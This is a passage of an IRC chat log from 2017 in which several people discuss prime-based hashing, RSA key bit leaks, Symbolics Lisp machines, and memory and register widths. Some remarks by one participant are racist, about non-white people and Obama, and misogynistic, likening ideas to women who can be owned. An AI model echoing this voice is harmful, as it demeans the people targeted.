separate problem from 'prime hash' 1738013;1510687113;asciilifeform;blender-toilets are standard in some locales, in fact 1738014;1510687116;asciilifeform;where narrow pipes 1738015;1510687119;mircea_popescu;your "prime hash" is not equiprobable, worst fucking hash ever. 1738016;1510687127;mircea_popescu;"add the digits" is a better hash. 1738017;1510687143;asciilifeform;what means 'not equiprobable' 1738018;1510687155;mircea_popescu;that you'll get some values more likely than others. 1738019;1510687161;apeloyee;I didn't claim prime constructer, just an improved method to generate candidates for miller-rabin 1738020;1510687166;asciilifeform;and how the hell does it compare to 'add the digits' -- there you get $base possible outputs 1738021;1510687176;mircea_popescu;but much more balancedly so. 1738022;1510687177;asciilifeform;nextprime gives countprimes(n) possible outputs. 1738023;1510687188;asciilifeform;and is as balanced as your rng is honest 1738024;1510687193;mircea_popescu;a hash where output x is y times more likely than output z is not a hash. it's a fash. 1738025;1510687194;asciilifeform;its only flaw is that it leaks via time 1738026;1510687212;apeloyee;some primes have many composites before them and thus are more likely 1738027;1510687217;mircea_popescu;^ 1738028;1510687238;asciilifeform;this is troo hm 1738029;1510687248;mircea_popescu;in fact imo the "prime hash" is a textbook example of "worst hash ever". 1738030;1510687255;mircea_popescu;i can'\t come up with a worse one on the spot. 1738031;1510687269;apeloyee;return 4;//guaranteed to be random 1738032;1510687274;asciilifeform;well if done with nextprime() then yes worst 1738033;1510687291;mircea_popescu;apeloyee great hash. always yields 4. unbreakable. what's the problem ? 1738034;1510687295;asciilifeform;but it remains open q , whether it can be done correctly (equiprobably) 1738035;1510687323;asciilifeform;(i.e. such that there is ~nothing~ that can be said in advance re what kind of prime will be chosen) 1738036;1510687325;apeloyee;write-only memory (TM) 1738037;1510687333;mircea_popescu;in fact, the return 4; hash is the ~only hash function about which we can say with certainty that no inverse exists. 1738038;1510687337;asciilifeform;lol 1738039;1510687340;mircea_popescu;TRUTH! 1738040;1510687375;mircea_popescu;great fucking hash, sadly not very usable. 1738041;1510687427;asciilifeform;incidentally, if one believes in hashes per se, 1738042;1510687430;asciilifeform;consider function : 1738043;1510687434;asciilifeform;hash-until-isprime 1738044;1510687447;asciilifeform;dun suffer, in principle, from the nextprime()-problem 1738045;1510687471;asciilifeform;( suffers from the flaw of potentially never terminating tho ) 1738046;1510687480;mircea_popescu;might actually be an interesting approach to the whole "hash evaluation" problem. 1738047;1510687485;asciilifeform;hm? 1738048;1510687485;mircea_popescu;see their PRIME densities etc. 1738049;1510687499;asciilifeform;aa 1738050;1510687530;asciilifeform;afaik even the shoddiest 1980s hash algo, produce ~perfect 'white noise'. hence the popularity of faux-rng via hashwhitener etc. 1738051;1510687542;mircea_popescu;"perfect" under what scrutiny ? 1738052;1510687544;asciilifeform;( see ancient metathread running back to 2013 ) 1738053;1510687548;asciilifeform;under every known scrutiny . 1738054;1510687562;asciilifeform;( aside from knowing the riddle key ) 1738055;1510687577;mircea_popescu;even the shoddiest 2011 scammers produce ~perfect "bitcoin business opportunities". hence the popularity of scam-investment. 1738056;1510687588;mircea_popescu;something like that ? 1738057;1510687615;*;mod6 shudders 1738058;1510687625;apeloyee;http://btcbase.org/log/2017-11-14#1737571 << if k MSBs of N are 1s, then k MSBs of p and q both are 1s, ie it only leaks sometimes. the leak itself is small, but since slightly biased RNG wouldn't be acceptable, then why this is? 1738059;1510687625;a111;Logged on 2017-11-14 14:25 mircea_popescu: http://btcbase.org/log/2017-11-14#1737516 << this is no leak ; it is a restatement of "first two bits set to 11, so you only use 2045 bit keys" 1738060;1510687636;asciilifeform;nah, in the sense where neither i nor anybody else can distinguish hash(fg output) from hash(we fuck pigs) , without knowing the answer ahead of time 1738061;1510687669;mircea_popescu;apeloyee because this is a mathematical leak, it's not avoidable properly speaking. multiplication is not a neutral op wrt the tails of the multiplicands. but leaks. 1738062;1510687673;asciilifeform;apeloyee: see http://btcbase.org/log/2017-11-14#1737387 approach 1738063;1510687673;a111;Logged on 2017-11-14 01:09 asciilifeform: the way i'd implement the whole shebang, is simply to reject both primes if the highest bit of pq is not 1 . 1738064;1510687682;mircea_popescu;once you decide rsa is based on mult, you decide to take the mult leak. 1738065;1510687695;apeloyee;what's the range of candidate p's? 1738066;1510687696;asciilifeform;it is possible, this way, to leak 'half a bit' instead of whole. 1738067;1510687708;asciilifeform;apeloyee exactly half of the bitness of modulus. 1738068;1510687721;mircea_popescu;apeloyee from 11(2045 bits unset)1 to 11(2045 bits set)1 1738069;1510687724;apeloyee;then my argument still applies 1738070;1510687738;mircea_popescu;ah you meant in his thing. yes it still applies, he shaves a further half bit is all. 1738071;1510687744;mircea_popescu;at significant cost, twas in the logs. 1738072;1510687748;asciilifeform;i did note this, you don't escape by gluing upper bits to equal 1 1738073;1510687754;asciilifeform;it's the same as doing nothing 1738074;1510687807;mircea_popescu;asciilifeform sometimes i get this feeling like he's trying to discern if we're idiots. 1738075;1510687850;asciilifeform;hey, d00d pumped his listening-before-talking muscle for so long that it's schwartzneger-sized 1738076;1510687982;asciilifeform;http://btcbase.org/log/2017-11-14#1737923 << i gotta add to this before it runs away : when making ~scriptlang~ ( rather than an actual lispm ) very different set of design tradeoffs might be acceptable, it they reduce complexity and in particular nonlisp LOC 1738077;1510687982;a111;Logged on 2017-11-14 18:50 phf: http://btcbase.org/log/2017-11-14#1737529 << that doesn't sound right, read and eval are distinct phases, by the time you get to eval you shouldn't be operating with strings when but instead with interned symbols (i.e. things that can be eq'd in lisp and pointer equivalent on c machine level) 1738078;1510688017;asciilifeform;i would like to see the minimal practical nonlisp loc, in such an animal 1738079;1510688046;asciilifeform;which could mean, for instance, dispensing with entire concept of interned string 1738080;1510688121;asciilifeform;http://btcbase.org/log/2017-11-14#1737917 << yes that was it! ty davout 1738081;1510688121;a111;Logged on 2017-11-14 18:00 davout: http://btcbase.org/log/2017-11-14#1737733 <<< "lord of war" iirc 1738082;1510688126;mircea_popescu;asciilifeform to get back to teh ceausescu lulz : he describes vasile alecsandri (a rich, old boyar who also wrote poems, very much like say pushkin, massive landholder etc. but ceausescu discusses his work in terms of oyu know, "this journalist kid from the 1800s, did his job, wrote for the people". 1738083;1510688168;mircea_popescu;i very much doubt he understood alecsandri as anything else. "a writer", yes, like a sort of newspaper man ++, a young mark twain, maybe talented, his paternal job being to "make available circumstances to development". 1738084;1510688181;asciilifeform;or possibly he wasn't prepared to piss on his pushkin ? 1738085;1510688189;asciilifeform;just as sov folx were not 1738086;1510688224;mircea_popescu;not at all. he had the most cursory familiarity with the man's work, of the exact sort as might have been pounded into a trades apprentice during basic schooling by kingdom efforts. 1738087;1510688244;mircea_popescu;had no idea of eg the man's letters, as they weren't in the 3rd grade manual. or of anything else. 1738088;1510688332;asciilifeform;hey americans to this day have ~0 problem 'respecting', e.g., washington, despite slave fleet ( and on top of it, near-total unletteredness ) 1738089;1510688356;mircea_popescu;i do not believe the man had any sort of comprehension of the world outside the sheerest anachronism. 1738090;1510688371;asciilifeform;sorta half of what makes'im interesting imho 1738091;1510688381;mircea_popescu;the ro folklore imagines the emperor's court as a sort of larger peasant house. i have no doubt ceausescu imagined all others as a sort of "people from village i have known" 1738092;1510688385;mircea_popescu;100% petrus in this sense. 1738093;1510688391;asciilifeform;time machine escapee. 1738094;1510688412;mircea_popescu;in a sense. yes, there's a certain purity in ignorance. 1738095;1510688452;mircea_popescu;(but the above, there is mention made of eg, emperor going out into the pridvor, ie peasant style veranda. cuz he must've had one. and so on. how could a house be without ? esp if rich enough ?) 1738096;1510688473;asciilifeform;waitasec is this false cognate with the ru 1738097;1510688488;mircea_popescu;all ro words are false cognates. that's what ro does. 1738098;1510688503;asciilifeform;( the noun is lost, but придворный remains 'courtier' ) 1738099;1510688506;mircea_popescu;cognate with old slavonic pritvoru 1738100;1510688534;mircea_popescu;~exonartex 1738101;1510688604;asciilifeform;of course reality caught up with poor shoemaker's imagination, and today's 'emperors' indeed have not only front porches but armchair with tv with foxnoose, and refrigerator full of 'bud' 1738102;1510688615;asciilifeform;just like the lowest prole 1738103;1510688651;mircea_popescu;ironically, romania's communist party had made the socialist republic very very far from the "sacred ideals". usg much more worthy of the S than rsr ever manafged to be. 1738104;1510688672;asciilifeform;sorta accounts for my somewhat contrarian reaction to the much-advertised 'golden toilet' aspect of ceaucescu 1738105;1510688678;mircea_popescu;(more fully visible, this evolution, in china. communists, rite ?) 1738106;1510688688;asciilifeform;'hey cool, he DIDN'T have fridge-of-bud') 1738107;1510688699;mircea_popescu;asciilifeform that's scandalous ahistorism. the man ate ~like a monk. 1738108;1510688705;mircea_popescu;was, amusingly, vegetarian. 1738109;1510688725;asciilifeform;bbbut the museum ! ( they opened a 'ceaucescu's summer palace' thing , with golden errrythings ) 1738110;1510688729;asciilifeform;2015 iirc 1738111;1510688749;apeloyee;ascillifeform: what do you need a scriptlang for if haz a proper lispm? to bootstrap lispm interpreter/compiler? 1738112;1510688752;mircea_popescu;by all accounts he had no sex in the 70s or 80s ; but in any case had not even satisfied that minimum bar of middle class bourgeoisie of a 2nd girl somewhere. 1738113;1510688762;asciilifeform;apeloyee: i ain't got a proper lispm, and neither does anybody else 1738114;1510688808;asciilifeform;but yes, to ditch the pyturds and perlisms 1738115;1510688816;asciilifeform;and the multi-GB liquishit ecosystem they drag along 1738116;1510688829;asciilifeform;i want a functioning scriptron on, e.g., my dos box. 1738117;1510688831;apeloyee;"ecosystem" is optional 1738118;1510688858;mircea_popescu;worst kind of optionality. optional like woman is optional. in practice... 1738119;1510688862;asciilifeform;^ 1738120;1510688886;apeloyee;how to avoid perlization of $newscriptlang then? 1738121;1510688902;mircea_popescu;the memstructs. 1738122;1510688905;asciilifeform;same way we avoid gavinization of trb, for instance. 1738123;1510688916;mircea_popescu;keeping sane memstructs 99% of the job i am pretty well persuaded. 1738124;1510689001;mircea_popescu;asciilifeform in other lulz : 1738125;1510689009;mircea_popescu;!~google olga kalashnikova 1738126;1510689010;jhvh1;mircea_popescu: Olga Kalashnikova - IMDb: ; Science - Aerosols And Clouds (329J): People: Olga Kalashnikova: ; about - Olga Kalashnikova | Actor, Model, Producer: 1738127;1510689028;asciilifeform;wassat 1738128;1510689031;mircea_popescu;(dudin's alt-explanation of who *** was in to ***) 1738129;1510689038;mircea_popescu;some slavegirl. 1738130;1510689092;asciilifeform;which linked chix is the 1 in question ? the film extra, or the academic 1738131;1510689097;mircea_popescu;neither. 1738132;1510689097;asciilifeform;or some other 1738133;1510689099;asciilifeform;aa 1738134;1510689107;asciilifeform;'tis a pretty common name actually 1738135;1510689118;asciilifeform;( originally a kalash is a type of breading ) 1738136;1510689123;asciilifeform;so roughly 'baker' 1738137;1510689130;mircea_popescu;http://p.bvulpes.com/pastes/45CHT/?raw=true item 1738138;1510689169;asciilifeform;aaaa lol 1738139;1510689187;phf;asciilifeform: i understand your point, but i'm not sure that the author in question made a choice by considering viable alternatives, rather than from not knowing 1738140;1510689204;asciilifeform;phf: my understanding is that author was simply doing homework 1738141;1510689279;BingoBoingo; 100% petrus in this sense. << Petrus Macht Frei! 1738142;1510689280;asciilifeform;btw phf seems like ivory not happenin' any time soon ( see thread http://btcbase.org/log/2017-11-14#1737657 ) . 1738143;1510689280;a111;Logged on 2017-11-14 14:55 asciilifeform: in sadder noose, cheapest bolix ivory microscopy quote, chinese, that covers all the layers ( metal and passivation ) is ~30,000 usd. 1738144;1510689331;apeloyee;do you like the 'ivory' architecture so much? 1738145;1510689344;asciilifeform;apeloyee: actually i do not particularly like it 1738146;1510689351;apeloyee;then...? 1738147;1510689360;mircea_popescu;not that many examples of not fundamentally braindamaged computing around. 1738148;1510689374;mircea_popescu;he likes the z80 for the same reasons in the same way. and other obsolete matter. 1738149;1510689375;asciilifeform;apeloyee: but on the other hand any attempt to build a sane arch, without fully grasping the bolix stack, from ic to the compiler, is lunacy. 1738150;1510689434;BingoBoingo; of course reality caught up with poor shoemaker's imagination, and today's 'emperors' indeed have not only front porches but armchair with tv with foxnoose, and refrigerator full of 'bud' << The local noise is dominated by 'bud' sales freefalling. Popular yet unverifiable by me theory is lack of once much marketed 'Born on date' discontinued by the Brazilians is letting retailers and wholesalers keep rancid product on 1738151;1510689434;BingoBoingo;shelf. 1738152;1510689475;mircea_popescu;alternatively, beer is swill to begin with, and esp the alt-flavoured sprite they sell in the us. 1738153;1510689493;asciilifeform;BingoBoingo: if 'coke' dies, 'pepsi' will reign, the basic idea remains 1738154;1510689525;asciilifeform;'emperor' drinks same flavoured water as the prole, today. 1738155;1510689542;BingoBoingo;The point is once lowered, bar keeps finding ways to fall further 1738156;1510689617;asciilifeform;apeloyee: ever see the infamous kalman reti film ? ( http://btcbase.org/log/2014-11-16#925610 mirror still seems to work ) 1738157;1510689617;a111;Logged on 2014-11-16 19:08 asciilifeform: http://people.csail.mit.edu/reti/SymbolicsTalk28June2012.m4v 1738158;1510689641;asciilifeform;i dun normally recommend 'screen films' but there is simply no other way to properly summarize what bolix was. 1738159;1510689659;asciilifeform;it has to be seen. 1738160;1510689809;phf;apeloyee: i have a friend who periodically attempts to write his own programming language, but without reading any documentation. when i ask him, hey, why not read lisp in small pieces or something, he just goes "well, i'm going to learn something just by trying", which i recently realized is straight up american education model. there's nothing that comes out of it though, he just keeps banging his head against solved problems! 1738161;1510689827;asciilifeform;this is the inevitable doom of people who will not read. 1738162;1510689844;asciilifeform;http://btcbase.org/log/2015-07-05#1188842 << see also 1738163;1510689844;a111;Logged on 2015-07-05 23:53 asciilifeform: or that other thread, which i can't seem to find, where we spoke of how 'maths wot is not essential for being published, but for even having publishable ideas instead of burning your life on fibonacci sequences or some other solved/irrelevant dead end' 1738164;1510689845;mircea_popescu;"could you guess from context what the unknown word means ???" 1738165;1510689851;mircea_popescu;the only answer is no. 1738166;1510689989;asciilifeform;( consider -- if the 'meaning can be had from context', why is the word even there on the page ? ) 1738167;1510689997;mircea_popescu;or for that matter, the page. 1738168;1510690001;asciilifeform;aaha 1738169;1510690050;mircea_popescu;it's the fundamental orcism, this. expressed pluriously by the orcs now inhabiting the once-proud colonies. "you couldn't know as you haven't experienced". really, bitch ? what the fuck DO YOU THINK KNOWLEDGE EVEN IS! 1738170;1510690066;mircea_popescu;and so on, a whole host of, centrally, the same thing. a sort of iliterate solipsism. 1738171;1510690212;asciilifeform;apeloyee: the other thing to consider, is that the preserved bolix material has ~unspeakably~ rich ( and quite high snr ) collection of artifacts, perhaps 1000 asciilifeform-years of work. take the ns vlsi compiler alone. i have the binaries, but not the src. and ~someone~ will have to make a sane (i.e. fully lispified and zero-externals) vlsitron. 1738172;1510690258;asciilifeform;just as ceaucescu was content to 'steal' vlsi from the decaying west, i am perfectly content to steal the algos from bolix. 1738173;1510690301;asciilifeform;by all indications, they were pretty effective -- but, far more importantly -- extremely compact. 1738174;1510690308;asciilifeform;( they had to be ) 1738175;1510690328;asciilifeform;and with ~zero~ overflowandcrashlang 'legacy' crapolade in the stack. 1738176;1510690344;asciilifeform;unlike every single extant piece of computing artifact . 1738177;1510690373;asciilifeform;the bolix people fit a complete lisp-to-silicon system in less space than taken by original 'wolfenstein' . 1738178;1510690392;asciilifeform;and it ran ok at 8mhz. 1738179;1510690430;mircea_popescu;asciilifeform you know it's traditionally spelled ceausescu. there's no soft c in romanian, esp not next to e. 1738180;1510690465;asciilifeform;i'm missing the proper letter on this particular terminal anyway lol 1738181;1510690470;mircea_popescu;:p 1738182;1510690514;mircea_popescu;asciilifeform did anyone transcribe this ? 1738183;1510690522;asciilifeform;which this 1738184;1510690526;mircea_popescu;reti's speech. wtf is with the sound only bs. 1738185;1510690536;asciilifeform;( note that no one in ru has any doubt how to pronounce d00d's name, because чаушеску makes perfect sense ) 1738186;1510690574;asciilifeform;mircea_popescu: iirc there was a captioned version on youtube. but seems to have evaporated. 1738187;1510690652;mircea_popescu;!G speech-to-text http://people.csail.mit.edu/reti/SymbolicsTalk28June2012.m4 1738188;1510690656;mircea_popescu;we need more bots. 1738189;1510690665;mircea_popescu;who wants to bring up a speech to text thing ? 1738190;1510690675;asciilifeform;iirc d00d doesn't exactly speak the king's englisch 1738191;1510690677;asciilifeform;so might not work 1738192;1510690681;asciilifeform;even if it worked 1738193;1510690684;mircea_popescu;gotta start somewhere. 1738194;1510690738;mircea_popescu;why is he so fucking nervous ? 1738195;1510690749;mircea_popescu;what is with all these people! 1738196;1510690763;asciilifeform;maybe he knew that the money were running out, lol 1738197;1510690777;asciilifeform;( reti is the other half of dks-and-reti skeleton crew ) 1738198;1510690809;asciilifeform;iirc he is the orig author of the ersatz ivory emulator 1738199;1510690851;mircea_popescu;i know a bunch of imbeciles who should speak a lot more hesitatingly than this guy. such as for instance ~everyone not-white. somehow, they don't, going all the way to like obama daring to even open his mouth in public. 1738200;1510690856;mircea_popescu;world is fucking backwards. 1738201;1510690884;ben_vulpes;fwiw google makes their robotranscripts available over http 1738202;1510690895;mircea_popescu;i expect, yes. 1738203;1510690899;asciilifeform;'Kalman Reti worked for Symbolics from 1982 through 1992, mostly on VLSI tools for Ivory but also writing low-level device support (e.g. a LMFS recovery utility, R/W optical drive support, LZW compressor, etc.) The last few years of that were spent doing customer consulting. After being laid off when Symbolics went into chapter 11, Kalman worked for Apple in Cambridge, first on MCL and later, after MCL was sold to Digitool, on Dylan. 1738204;1510690899;asciilifeform; Kalman was hired after that by Symbolics Technology, Inc., who had acquired the assets of Symbolics from the bankruptcy court, to work on further productizing the emulator for the Alpha. This was used by John Mallery at MIT to run his document distribution system for the White House during the Clinton presidency. When the owners of that venture decided that a financial company had no business owning a computer company, a private ind 1738205;1510690900;asciilifeform;ividual bought the assets and Kalman spent 4 years as a "captive consultant" for him. Since 2002, when he ran out of money, I've worked for Ab Initio (doing nothing with lisp except emacs hacks).' 1738206;1510690915;asciilifeform;( src, another d00d who was there, infamous crackpot http://fare.livejournal.com/168016.html ) 1738207;1510690999;phf;(crackpot in question is also in all your lisps, fucking with your asdfs) 1738208;1510691005;asciilifeform;aha 1738209;1510691009;mircea_popescu;iirc phf dun like fare so much. 1738210;1510691013;asciilifeform;i dun either 1738211;1510691041;mircea_popescu;since we're doing this, here's a fundamental point i don't understand. 1738212;1510691063;mircea_popescu;why, again, is there a relation between cpu register bit width and memory-allocation-unit bit width ? 1738213;1510691099;mircea_popescu;for one thing, historical concept of pages seems to suggest that the relationship is exactly of the nature of "byte=octet, we're dumb". 1738214;1510691110;asciilifeform;let's suppose the contrary 1738215;1510691114;mircea_popescu;let's. 1738216;1510691124;asciilifeform;how would memory-to-reg and reg-to-memory MOV look on this iron ? 1738217;1510691140;mircea_popescu;how does mult of two regs look ? 1738218;1510691148;asciilifeform;lessay ram is fetchable in 11bit chunks but regs are, say , 17 wide 1738219;1510691161;asciilifeform;mult is necessarily 2b wide ( where b is the reg bitness ) 1738220;1510691162;mircea_popescu;let's instead say thatr we have a modern machine, with 64 bit bytes and 1mb bit pages. 1738221;1510691176;asciilifeform;pages are not a fundamental unit tho 1738222;1510691192;mircea_popescu;in this model they are. memory (ram, disk, whatever -- comes in pages) 1738223;1510691211;asciilifeform;( they are only reflected in iron at all, on 'optimized for c' abortions where have 'iron pagetable' ) 1738224;1510691225;mircea_popescu;so your hdd nodes, for instrance, are... 1mb. and your ddram lines are... 1mb. 1738225;1510691226;asciilifeform;but a page is simply a fixed qty of addressable machinewords 1738226;1510691236;mircea_popescu;yes, but hardware-fixed. 1738227;1510691243;mircea_popescu;one drive sector, one ddr line. 1738228;1510691274;mircea_popescu;and, obviously, 1 video buffer. 1738229;1510691300;asciilifeform;well orig q was 'why is there a relationship' but seems like mircea_popescu is really asking 'why pc regs so tiny' 1738230;1510691315;mircea_popescu;no, i am asking why exactly is one item unrelated to another item married to it. 1738231;1510691325;asciilifeform;there being a relationship at all, comes from the fact that the two types of bucket regularly get emptied into one another 1738232;1510691328;mircea_popescu;it's obvious why cpu regs are "tiny" : so many lines worth putting down in gold. 1738233;1510691338;mircea_popescu;asciilifeform this seems sufficient cause to you ? 1738234;1510691363;asciilifeform;i have noted in the past that it is possible to have, e.g., wider regs but fewer of'em 1738235;1510691368;asciilifeform;with same transistor cost 1738236;1510691385;mircea_popescu;rather, keep the regs, gimme "page to page hdd to ram and video" ops. 1738237;1510691390;asciilifeform;( the 1 exception where the cost is nonlinear may be the barrel shifter ) 1738238;1510691409;asciilifeform;let's consider how ram is typically sold 1738239;1510691412;mircea_popescu;consider if you wrote/read the disk/net/video 1mb at a time. 1738240;1510691431;asciilifeform;chip is typically 'x * y' where x is input bitness and y -- output 1738241;1510691455;asciilifeform;so you can readily buy, e.g., 16x1 i.e. 65536 bits of ram, addressable 1 bit at a time 1738242;1510691473;asciilifeform;( e.g. 0000000000000000 input gives you the first of'em ) 1738243;1510691480;mircea_popescu;right. 1738244;1510691505;asciilifeform;you can also buy x * 4, x * 8, x * 9, 16, 18 ( most common sizes ) 1738245;1510691522;asciilifeform;at one time they were uncommon, and a stick of memory tended to have as many chips as the bus bitness 1738246;1510691534;asciilifeform;( using x*1 strictly ) 1738247;1510691566;asciilifeform;but even with the widest, you will need quite a few to make machine with, e.g., 8192-bit word. ( and your cpu now needs 8192bit regs 0 1738248;1510691568;asciilifeform;) 1738249;1510691593;mircea_popescu;now suppose i want to read some of this memory. what happens is that the controller reads A WHOLE LINE, and then selects from it the bit i wanted and spits it out. 1738250;1510691601;mircea_popescu;but this is spuriosity. let it feed out... the whole line. 1738251;1510691630;asciilifeform;what's the use of simultaneously lighting up a whole line, simply to blow the clock cycle on reading 1 bit ?? 1738252;1510691634;mircea_popescu;asciilifeform how is a 1GB ram chip store the 2^30 bits ? 1738253;1510691637;asciilifeform;matrix 1738254;1510691645;mircea_popescu;and this matrix is about... 1mb wide ? 1738255;1510691672;asciilifeform;it's generally ~square, geometrically 1738256;1510691682;mircea_popescu;asciilifeform because you ~never read one bit. that's the issue here, whole fucking hardware is built around nonsense. nobody reads 1 bit ; and for most applications 1 byte (ie, 64 bits!) is actually an underbyte. 1738257;1510691702;asciilifeform;well yes. hence typical pc has 128+b wide drams 1738258;1510691703;mircea_popescu;asciilifeform fwis mostly rectangular, but anyway. 1738259;1510691756;mircea_popescu;asciilifeform typical pc has the following situation : 64 bit registers, 128 bit memory, 1024 bit disk sectors, 64 mb video buffers, and atop sitting a drunk driver who thinks 8 bits are a byte. 1738260;1510691761;mircea_popescu;if this makes sense... 1738261;1510691796;mircea_popescu;meanwhile we're introducing 4096 bit keys, and 4096 bit message sizes. 1738262;1510691797;asciilifeform;worse 1738263;1510691813;asciilifeform;recent (~decade) x86 has 128, and even 256b, registers also.. 1738264;1510691827;asciilifeform;hybrid of bulldog and rhinoceros on every level 1738265;1510691881;mircea_popescu;whatr the fduck is he even talking about, "tagging every word". fucker, small words hardly worth tagging! make your word 4096 bits, tag THAT. 1738266;1510691894;asciilifeform;there was ONE size of word 1738267;1510691906;mircea_popescu;"oh, couldn't be done on hardware of back then". tell you what, fucking your wife also couldn't be done on your hardware of back when junior high. 1738268;1510691909;asciilifeform;and no such thing as untagged, on whole box. that was the whole strength of the edifice. 1738269;1510691915;mircea_popescu;asciilifeform yes but too small. 1738270;1510691927;asciilifeform;they'd happily have made 512b words, if the iron existed. 1738271;1510691932;asciilifeform;as it is 40b broke the back. 1738272;1510691934;mircea_popescu;i suspect. 1738273;1510691950;asciilifeform;whole thing was a valiant effort to make a thing that was just short of technologically impossible. 1738274;1510691967;mircea_popescu;and that meanwhile became quite technologically comfortable. 1738275;1510691982;asciilifeform;fwiw the 3600 series ( pre-ivory ) were 36b 1738276;1510692007;asciilifeform;item grew as the iron became available ( i do not even say 'affordable' , thing was a 'cost no object' design, like aston-martin ) 1738277;1510692036;mircea_popescu;he's now at describing the mindbogglingly ugly hacks of how to get 32 bit fixnums out of 36 bit words with 6 bits of tag and 2 of code and so on, "oh actually the lowe order quarter can be repurposed" 1738278;1510692039;mircea_popescu;holly hell already. 1738279;1510692046;mircea_popescu;be less poor, solve better problems. 1738280;1510692054;asciilifeform;asciilifeform ( and quite a few other folx, i suspect even earlier ) realized in ~2005 that it was eminently practical with modern silicon 1738281;1510692080;mircea_popescu;asciilifeform what did they use as hardware hash ? 1738282;1510692086;asciilifeform;but modern silicon instead gets 2million transistors for motherfucking tlb cache so that winblowz can page less. 1738283;1510692101;mircea_popescu;(lulz of all time, 3600 came with built-in bitcoin miner) 1738284;1510692115;asciilifeform;mircea_popescu: wish i knew ! sorta why i wanted the thing microscopied. 1738285;1510692122;mircea_popescu;ikr. 1738286;1510692124;asciilifeform;plenty of unanswered q's re the arch. 1738287;1510692133;mircea_popescu;esp as this apparently was ephemera. 1738288;1510692139;asciilifeform;it was ALL ephemera. 1738289;1510692146;asciilifeform;these folx had no notion of making any of the details public. 1738290;1510692159;mircea_popescu;mit. pshew. 1738291;1510692159;asciilifeform;( can't even say i have any outrage over this, there was no logical reason to publish ) 1738292;1510692176;asciilifeform;mit was not involved other than as patent licensor/troll at that point 1738293;1510692189;mircea_popescu;it was involved as mental poison in these people's heads. 1738294;1510692210;mircea_popescu;no conception of who the enemy is and why exactly, etcetera. 1738295;1510692227;asciilifeform;they were ~same as su academics , in that respect 1738296;1510692228;phf;well, folx in question plundered as much as they could from mit and carefully guarded whatever they themselves produce. i don't know about there not being "logical reason to publish" 1738297;1510692254;asciilifeform;and yes if you publish , patent troll could easily use it against you, so culture of seekrecy 1738298;1510692255;mircea_popescu;"worst thing that can happen to smart people is an easy money source early on" 1738299;1510692262;asciilifeform;'must hide my theft' 1738300;1510692274;asciilifeform;same reason for ~90% of closedsourcedriverism today, say. 1738301;1510692302;mircea_popescu;asciilifeform something deeply wrong with response to mother shrieking about her daugher being fucked diverging from beating mother up / fucking her too. but... we digress. 1738302;1510692329;phf;it's funny that 36xx series is basically an improved cadr. ivory on the other hand? literally scheme86: they poached both the main guy who worked on the cpu ~and the entire toolset~. ivory was still designed on CADR (rather than smbx), because that's where scheme team designed theirs 1738303;1510692332;asciilifeform;hey if pyongyang or bucharest were running a lispm project and invited defectors, i suspect folx would've come 1738304;1510692371;asciilifeform;phf: aha, it was why scheme(orig. '79') cpu, evaporated 1738305;1510692374;mircea_popescu;amusingly bucharest had nfi idea at the time it COULKD have done such a thing. literally 0 conception of what any of the items we're discussing here WERE. at all. not even the priors present. 1738306;1510692396;asciilifeform;su had, interestingly, early and stillborn attempt at lispm 1738307;1510692401;asciilifeform;( really, 'refal'-m ) 1738308;1510692404;mircea_popescu;phf i had the idea cadr more of a common ancestor, to smbx too. 1738309;1510692418;asciilifeform;( died with the sunken atlantis, nothing afaik heard of it since 1990 ) 1738310;1510692559;phf;well, rms's nervous break down makes some sense when you actually read the code. there's a very obvious clear "steal everything that's not bolted" going on. cadr's SYSTEM sources were being developed in parallel with symbolics and LMI (to the point that there are conditionals in the cadr's code to compile os both on lmi and genera), with interactions slowly decreasing over time 1738311;1510692587;mircea_popescu;im not even sure what theft means in this context. 1738312;1510692599;mircea_popescu;can you define ? 1738313;1510692617;asciilifeform;iirc rms was most incensed re the luring away of ~people~, rather than lifted code 1738314;1510692623;mircea_popescu;the attempt might well illustrate why i meant above re http://btcbase.org/log/2017-11-14#1738293 (o oops, i stoled myself!) 1738315;1510692623;a111;Logged on 2017-11-14 20:43 mircea_popescu: it was involved as mental poison in these people's heads. 1738316;1510692638;mircea_popescu;asciilifeform i had the same impression. social not technological issue. 1738317;1510692662;asciilifeform;none of the code in question -- at least in so far as it is accessible to modern archaeologist's eye -- was particularly deep 1738318;1510692669;asciilifeform;( re rms specifically ) 1738319;1510692699;asciilifeform;rms was not ,in so far as i can tell, involved in the http://btcbase.org/log/2017-11-14#1738171 aspects ) 1738320;1510692699;a111;Logged on 2017-11-14 20:10 asciilifeform: apeloyee: the other thing to consider, is that the preserved bolix material has ~unspeakably~ rich ( and quite high snr ) collection of artifacts, perhaps 1000 asciilifeform-years of work. take the ns vlsi compiler alone. i have the binaries, but not the src. and ~someone~ will have to make a sane (i.e. fully lispified and zero-externals) vlsitron. 1738321;1510692717;mircea_popescu;it is particularily difficult to explain what one means by theft of a) ideal objects by b) parties who actually own them intellectually and c) when the objects were produced within their lifetimes. 1738322;1510692720;asciilifeform;greenspun, on other hand -- was 1738323;1510692757;mircea_popescu;(ownership here means what it means sexually -- if she submits she's yours, woman, idea, whatever.) 1738324;1510692792;mircea_popescu;plurious agents can own the same idea in the mannger they can have the same girlfriend. knowing about it not required. 1738325;1510692817;asciilifeform;it was never clear to me from rms's surviving writing what he thought mit ought to have done with the lispm, if not to license to manufacturers 1738326;1510692823;asciilifeform;mit was never in the business of selling comps 1738327;1510692839;asciilifeform;i suspect that he simply did not even think about it. 1738328;1510692889;mircea_popescu;i suspect he was a bureaucrat (intellectually insufficient ; aware of this ; politically ambitious) and he resented the lack of control over smarter people. 1738329;1510692891;mircea_popescu;no more than this. 1738330;1510692900;mircea_popescu;his political activism later on entirely predicable on this. 1738331;1510692901;asciilifeform;d00d was in no sense in control tho 1738332;1510692912;asciilifeform;he wasn't the director of lispm group or anything of the kind 1738333;1510692917;mircea_popescu;control as the psychological construct is complicated. 1738334;1510692923;phf;mircea_popescu: i was taking a poetic liberty there. it's the new appearance of a self serving strategy where there wasn't necessarily one (or the strategy changes drastically). the core of activity shifts elsewhere, but the original points of contact are maintained for the sole purpose of taking any new ideas that might've been introduced. 1738335;1510692956;mircea_popescu;phf in the sense that they were trying to sell the machines, but avoid as much of the dev work as humanly possible ? 1738336;1510692961;asciilifeform;near as i can tell, he was the proverbial nursing home patient described on trilema, who says 'died, whaddayamean, died, where is jane?! we were USED to her' re every colleague who went off to bolix or lmi 1738337;1510692974;mircea_popescu;asciilifeform entirely possible. 1738338;1510692975;mircea_popescu;bbs. 1738339;1510693026;phf;mircea_popescu: right 1738340;1510694324;mircea_popescu;not altogether clear how self-serving that was. 1738341;1510694353;mircea_popescu;given that 